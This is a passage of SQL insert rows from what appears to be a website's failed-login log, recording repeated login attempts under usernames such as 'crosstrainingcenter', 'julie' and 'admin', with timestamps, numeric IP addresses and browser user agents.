(103719, 1499955363.318212, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3005793335, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103720, 1499955364.769688, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3005793335, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103721, 1499958896.420706, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2975966430, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103722, 1499958897.892551, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2975966430, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103723, 1499958927.078609, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2399159864, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103724, 1499958928.468742, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2399159864, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103725, 1499959131.269516, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3000294731, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103726, 1499959132.261970, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3000294731, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103727, 1499960233.161153, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 89774375, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103728, 1499960234.755380, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 89774375, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103729, 1499961687.407316, 1, 'loginFailValidUsername', 'julie', 2, 874674276, ''),
(103730, 1499964519.206692, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/533.97.50 (KHTML, like Gecko) Version/5.5.0 Safari/532.14'),
(103731, 1499964716.814703, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2696033151, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103732, 1499964717.877707, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2696033151, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103733, 1499965445.051959, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3481717135, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103734, 1499967702.651124, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2537068122, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103735, 1499967703.686203, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2537068122, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103736, 1499967944.146978, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 520125869, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103737, 1499967945.246863, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 520125869, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103738, 1499967945.298617, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1474582670, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103739, 1499967946.308686, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1474582670, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103740, 1499968049.308259, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1706422897, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103741, 1499968051.068140, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1706422897, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103742, 1499968331.876484, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 737221779, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103743, 1499968333.138881, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 737221779, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103744, 1499968500.130177, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1335233595, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103745, 1499968501.095176, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1335233595, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103746, 1499970108.763730, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2982802832, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103747, 1499970110.283150, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2982802832, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103748, 1499970519.034060, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1579299347, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103749, 1499970520.018434, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1579299347, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103750, 1499973443.560573, 1, 'loginFailValidUsername', 'julie', 2, 921460302, ''),
(103751, 1499974328.745129, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1363407118, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103752, 1499974330.156745, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1363407118, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103753, 1499975143.352178, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1332022548, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103754, 1499975145.470693, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1332022548, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103755, 1499977136.349008, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1357239457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103756, 1499977137.309758, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1357239457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103757, 1499978056.997360, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1834801081, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103758, 1499978058.153834, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1834801081, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103759, 1499982016.256832, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3378439150, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103760, 1499982017.703514, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3378439150, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103761, 1499985642.197314, 1, 'loginFailValidUsername', 'julie', 2, 584228837, ''),
(103762, 1499987606.656036, 1, 'loginFailValidUsername', 'julie', 2, 918256259, ''),
(103763, 1499988861.745863, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1773860999, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103764, 1499988863.388740, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1773860999, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103765, 1499989888.645228, 1, 'loginFailValidUsername', 'julie', 2, 583622267, ''),
(103766, 1499991455.983873, 1, 'loginFailValidUsername', 'julie', 2, 919156026, ''),
(103767, 1499991721.383256, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1451111390, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103768, 1499991723.357914, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1451111390, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103769, 1499993182.853474, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3197462569, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103770, 1499993631.706255, 1, 'loginFailValidUsername', 'julie', 2, 2927706329, ''),
(103771, 1499994082.741680, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 702461109, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103772, 1499995185.849019, 1, 'loginFailValidUsername', 'julie', 2, 3438069403, ''),
(103773, 1499995226.669498, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3301487042, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103774, 1499995228.194064, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3301487042, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103775, 1499996230.463095, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1443763374, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103776, 1499996231.441462, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1443763374, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103777, 1499996608.756485, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892882789, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103778, 1499996610.565622, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892882789, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103779, 1500000328.946344, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3588843488, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103780, 1500000330.259801, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3588843488, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103781, 1500000947.895244, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1110582034, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103782, 1500000949.106954, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1110582034, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103783, 1500001332.375868, 1, 'loginFailValidUsername', 'julie', 2, 920891349, ''),
(103784, 1500001758.400657, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3082189155, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103785, 1500001760.020817, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3082189155, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103786, 1500006725.000887, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2115444782, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103787, 1500006726.440368, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2115444782, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103788, 1500007363.371753, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1415292827, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103789, 1500007364.409847, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1415292827, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103790, 1500007368.573293, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1590645433, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103791, 1500007369.803918, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1590645433, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103792, 1500008984.863994, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 690623637, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103793, 1500008986.280983, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 690623637, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103794, 1500011635.316414, 1, 'loginFailValidUsername', 'julie', 2, 585452219, ''),
(103795, 1500011864.854384, 1, 'loginFailInvalidUsername', 'test', 0, 3577295515, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103796, 1500012406.518817, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1463988859, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103797, 1500012407.497134, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1463988859, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103798, 1500012916.126961, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 658243494, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103799, 1500012918.671363, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 658243494, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103800, 1500013383.531362, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657181830, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103801, 1500013384.860933, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657181830, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103802, 1500013749.497765, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/531.73.10 (KHTML, like Gecko) Chrome/55.1.6185.0813 Safari/532.02 OPR/42.9.4462.9190'),
(103803, 1500014026.612204, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3032363601, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103804, 1500014028.118837, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3032363601, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103805, 1500018461.058613, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2050272050, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103806, 1500018462.549230, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2050272050, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103807, 1500020999.523213, 1, 'loginFailValidUsername', 'julie', 2, 921460942, ''),
(103808, 1500021168.361468, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549958265, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103809, 1500021169.536429, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549958265, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103810, 1500022418.464929, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1315283100, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103811, 1500022419.683405, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1315283100, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103812, 1500022810.988574, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1976134945, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103813, 1500022813.255190, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1976134945, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103814, 1500023470.928661, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 455217818, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103815, 1500024185.621304, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 831750083, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103816, 1500024187.360498, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 831750083, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103817, 1500024884.297747, 1, 'loginFailInvalidUsername', 'test', 0, 1577771674, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103818, 1500024885.451573, 1, 'loginFailInvalidUsername', 'test', 0, 1577771674, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103819, 1500026583.867859, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2946418978, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103820, 1500026586.486761, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2946418978, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103821, 1500027974.355758, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2945033693, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103822, 1500027975.836818, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2945033693, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103823, 1500031344.857782, 1, 'loginFailValidUsername', 'julie', 2, 919161641, ''),
(103824, 1500031576.002061, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3018581141, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103825, 1500031577.349734, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3018581141, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103826, 1500032599.515394, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 701435096, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103827, 1500032604.139943, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 701435096, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103828, 1500034165.987840, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549204432, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103829, 1500034167.939453, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549204432, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103830, 1500035653.320581, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 697075893, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103831, 1500035654.886599, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 697075893, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103832, 1500036575.441883, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 453444155, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103833, 1500036576.693087, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 453444155, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103834, 1500037485.323757, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1406382124, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103835, 1500037486.664616, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1406382124, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103836, 1500038716.039133, 1, 'loginFailValidUsername', 'admin', 1, 3526612805, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(103837, 1500041153.702336, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2039252651, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103838, 1500041155.208940, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2039252651, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103839, 1500041312.094468, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 638916126, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103840, 1500041313.430547, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 638916126, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103841, 1500042019.922070, 1, 'loginFailValidUsername', 'julie', 2, 585410037, ''),
(103842, 1500044693.855809, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 737942384, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103843, 1500044696.517566, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 737942384, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103844, 1500047505.948147, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1480601225, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103845, 1500047506.886963, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1480601225, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103846, 1500048259.217492, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1781787123, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103847, 1500048261.036797, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1781787123, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103848, 1500048293.808964, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1337027635, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103849, 1500051510.797021, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 771326399, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103850, 1500051512.252585, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 771326399, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103851, 1500052505.572951, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 583622267, ''),
(103852, 1500054931.411478, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 634555953, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103853, 1500056202.709559, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2922252163, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103854, 1500056204.092471, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2922252163, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103855, 1500056529.727493, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1225153788, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103856, 1500056531.253270, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1225153788, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103857, 1500057403.553510, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3220959133, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103858, 1500057404.926957, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3220959133, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103859, 1500057690.813412, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 694781465, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103860, 1500057692.411618, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 694781465, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103861, 1500060752.942899, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3725124862, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103862, 1500060754.452926, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3725124862, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103863, 1500060777.219020, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 6.0; WOW64; rv:52.52.04) Gecko/20163724 Firefox/52.52.04'),
(103864, 1500062586.571111, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 404453904, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103865, 1500063161.092274, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 692377094, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103866, 1500063614.026302, 1, 'loginFailValidUsername', 'julie', 2, 584376477, ''),
(103867, 1500064145.800931, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3196974798, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103868, 1500064147.145413, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3196974798, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
